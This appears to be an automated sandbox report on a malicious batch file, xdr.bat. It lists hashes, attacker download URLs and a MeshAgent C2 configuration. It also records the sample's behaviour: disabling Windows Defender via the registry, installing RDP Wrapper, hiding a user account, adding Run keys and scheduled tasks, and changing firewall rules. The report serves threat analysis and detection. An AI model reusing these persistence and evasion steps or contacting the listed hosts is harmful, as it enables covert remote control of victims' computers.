Analysis
-
max time kernel
136s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24/10/2024, 17:40
Static task
static1
Behavioral task
behavioral1
Sample
xdr.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
xdr.bat
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
xdr.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
xdr.bat
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral5
Sample
xdr.bat
Resource
win11-20241007-en
General
-
Target
xdr.bat
-
Size
4KB
-
MD5
9e779d369e3ca17fdc894d13c4fd797a
-
SHA1
bf7e34e0da33a587177e66cfcec51f3aa75b4a87
-
SHA256
15dd389f66e269ea795710fa580b7e403d628f281c71ebf4d845dbc7d0bdf394
-
SHA512
ab290641c94cd7d3270a236af9f1e849ea056fddcf3120afc3dbad61afd63453eca3732093799cc6b82f2275da74d374c453a324fa9e465d931d2dff71b351b1
-
SSDEEP
96:IQ356afgPZCo/r+ab5iGp8HRI3h8UfpTsbUdGD:Iw56afgQHRq8UfGbdD
Malware Config
Extracted
http://45.139.196.250/ngrok.yml
Extracted
http://45.139.196.250/ngrok.zip
Extracted
http://152.89.239.119/x222.jpg
Extracted
http://45.139.196.250/WindowsUpdate.jpg
Extracted
http://45.139.196.250/auto-install-hrdp.bat
Extracted
http://45.139.196.250/hrdp/hrdp.zip
Extracted
http://45.139.196.250/hrdp/update.zip
Extracted
http://45.139.196.250/hrdp/autoupdate.zip
Extracted
meshagent
2
hawlat
http://45.139.196.71:443/agent.ashx
-
mesh_id
0x2C8478969E4CFA9513F19039B18062AD421F4DAF221C1152A30999ADFFCB13924EE4197808C0B50EB8A4890383CFE71E
-
server_id
71C17FDD46B31764650F2D1D58C0308252130889EAD2CB51F652D3D44DDA6687355E5D788FD7CFD214D97F8E3D42DDAB
-
wss
wss://45.139.196.71:443/agent.ashx
Signatures
-
Detects MeshAgent payload 3 IoCs
resource yara_rule behavioral3/memory/4424-16-0x0000000000A20000-0x0000000000DED000-memory.dmp family_meshagent behavioral3/files/0x0007000000023c9f-18.dat family_meshagent behavioral3/memory/4424-22-0x0000000000A20000-0x0000000000DED000-memory.dmp family_meshagent -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
flow pid Process 30 556 powershell.exe 31 4052 powershell.exe 37 4448 powershell.exe 39 2152 powershell.exe 48 5112 powershell.exe 50 3968 powershell.exe 56 1752 powershell.exe 57 1648 powershell.exe 69 1696 cscript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs
Run Powershell and hide display window.
pid Process 1352 powershell.exe 1352 powershell.exe 1288 powershell.exe 3960 powershell.exe 2556 powershell.exe 3024 powershell.exe 556 powershell.exe 4448 powershell.exe 2152 powershell.exe 4800 powershell.exe 4052 powershell.exe 5112 powershell.exe 3968 powershell.exe 1752 powershell.exe 1648 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 7 IoCs
pid Process 2452 netsh.exe 4272 netsh.exe 3096 netsh.exe 3704 netsh.exe 4828 netsh.exe 2696 netsh.exe 3252 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "C:\\Program Files\\RDP Wrapper\\rdpwrap.dll" reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%SystemRoot%\\System32\\termsrv.dll" RDPWInst.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe -
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4076 attrib.exe 2504 attrib.exe 3528 attrib.exe 2156 attrib.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" " s.exe -
Executes dropped EXE 21 IoCs
pid Process 2696 MeshAgent.exe 3516 MeshAgent.exe 5040 RDPWInst.exe 2888 MeshAgent.exe 1908 RDPWInst.exe 2156 MeshAgent.exe 4992 RDPWInst.exe 4928 RDPWInst.exe 3988 RDPWInst.exe 456 MeshAgent.exe 4928 RDPWInst.exe 1900 RDPWInst.exe 3796 MeshAgent.exe 3336 RDPWInst.exe 4332 RDPWInst.exe 2960 MeshAgent.exe 3576 MeshAgent.exe 4460 MeshAgent.exe 3960 MeshAgent.exe 1324 MeshAgent.exe 1180 MeshAgent.exe -
Loads dropped DLL 6 IoCs
pid Process 1868 svchost.exe 3648 svchost.exe 2020 svchost.exe 1780 svchost.exe 1292 svchost.exe 5072 svchost.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsPowerup = "C:\\ProgramData\\Windata\\srlhost.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdatez = "C:\\ProgramData\\Windata\\WindowsUpdate.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 59 raw.githubusercontent.com 65 raw.githubusercontent.com 69 raw.githubusercontent.com 51 raw.githubusercontent.com 52 raw.githubusercontent.com -
Modifies WinLogon 2 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\oleaut32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wuser32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\MeshService.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wwin32u.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wwin32u.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wwin32u.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\MeshService.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wgdi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wrpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ole32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\Kernel.Appcore.pdb MeshAgent.exe File created C:\Windows\System32\rfxvmt.dll RDPWInst.exe File opened for modification C:\Windows\SysWOW64\dll\wrpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\system32\Recovery\ReAgent.xml ReAgentc.exe File opened for modification C:\Windows\SysWOW64\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\combase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wkernelbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ws2_32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\bcryptprimitives.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\exe\MeshService.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wkernelbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wwin32u.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wrpcrt4.pdb MeshAgent.exe -
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist\t1 = "0" reg.exe -
Drops file in Program Files directory 61 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files\RDP Wrapper\termsrv.dll cmd.exe File created C:\Program Files\RDP Wrapper\helper\autoupdate__disable_autorun_on_startup.bat powershell.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini cmd.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files\RDP Wrapper\RDPWInst.exe cmd.exe File created C:\Program Files\RDP Wrapper\helper\autoupdate__info.txt powershell.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\helper\autoupdate__info.txt powershell.exe File opened for modification C:\Program Files\RDP Wrapper\autoupdate.bat powershell.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File created C:\Program Files\RDP Wrapper\rdpwrap_new.ini cscript.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File created C:\Program Files\RDP Wrapper\autoupdate.zip powershell.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File created C:\Program Files\RDP Wrapper\update.zip powershell.exe File opened for modification C:\Program Files\RDP Wrapper\helper\autoupdate__disable_autorun_on_startup.bat powershell.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\rdpwrap_ini_updater.bat powershell.exe File created C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\usage.txt powershell.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini cmd.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini cmd.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.exe s.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\usage.txt powershell.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.msh MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\termsrv.dll cmd.exe File created C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\re-install.bat powershell.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\re-install.bat powershell.exe File created C:\Program Files\RDP Wrapper\autoupdate.bat powershell.exe File created C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat powershell.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini cmd.exe File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files\RDP Wrapper\rdpwrap.ini RDPWInst.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe File opened for modification C:\Program Files\RDP Wrapper\RDPWInst.exe cmd.exe File created C:\Program Files\RDP Wrapper\rdpwrap_ini_updater_(02_August_2019)\rdpwrap_ini_updater.bat powershell.exe File opened for modification C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat powershell.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files\RDP Wrapper\rdpwrap.dll RDPWInst.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4076 sc.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 21 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language s.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MeshAgent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 396 PING.EXE -
Modifies data under HKEY_USERS 13 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133742652743294442" MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 396 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2556 schtasks.exe 5008 schtasks.exe 2340 schtasks.exe 3324 schtasks.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 69 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
